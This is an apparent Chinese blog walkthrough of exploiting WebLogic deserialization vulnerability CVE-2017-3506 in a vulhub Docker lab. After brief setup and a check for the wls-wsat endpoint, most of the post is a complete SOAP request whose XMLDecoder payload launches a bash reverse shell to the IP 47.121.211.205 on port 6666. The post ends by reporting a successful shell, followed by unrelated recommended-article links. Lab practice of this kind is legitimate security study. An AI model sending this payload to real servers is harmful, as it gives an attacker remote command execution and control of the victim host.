webLogic反序列化漏洞CVE-2017-3506

1.环境搭建

cd vulhub-master/weblogic/weak_password

docker-compose up -d

2.判断wls-wsat组件是否存在

拼接/wls-wsat/CoordinatorPortType

查看页面是否有回显 有回显说明存在组件

3.在当前页面抓包 反弹shell

添加请求包内容

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

<soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.8.0_131" class="java.beans.XMLDecoder">

<object class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/47.121.211.205/6666 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></object>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>

成功反弹shell

相关推荐
qq_3404740214 分钟前
6.1 python加载win32或者C#的dll的方法
java·python·c#
审计侠28 分钟前
Apache Struts2 漏洞(CVE-2017-5638)技术分析
java·struts·web安全·apache·安全性测试
前往深圳1 小时前
数据结构:LinkedList与链表
java·开发语言·学习
敲键盘的小夜猫1 小时前
Java服务端性能优化:从理论到实践的全面指南
java·开发语言·性能优化
weixin_425878231 小时前
k8s 自动伸缩的场景与工作原理
java·容器·kubernetes
爱的叹息1 小时前
Spring boot 中QPS(Queries Per Second)与 TPS(Transactions Per Second)详细对比
java·spring boot·后端
小小鸭程序员1 小时前
Spring Boot整合MyBatis-Plus实现CRUD操作教程
java·spring boot·python·mysql·spring
Repeat7151 小时前
日志统计(双指针)
java·数据结构·算法·蓝桥杯·双指针·滑动窗口
快来卷java1 小时前
MySQL篇(四)事务相关知识详解
java·数据库·mysql·链表
CodeCraft Studio2 小时前
PDF处理控件Aspose.PDF教程:在Python、Java 和 C# 中旋转 PDF 文档
java·python·pdf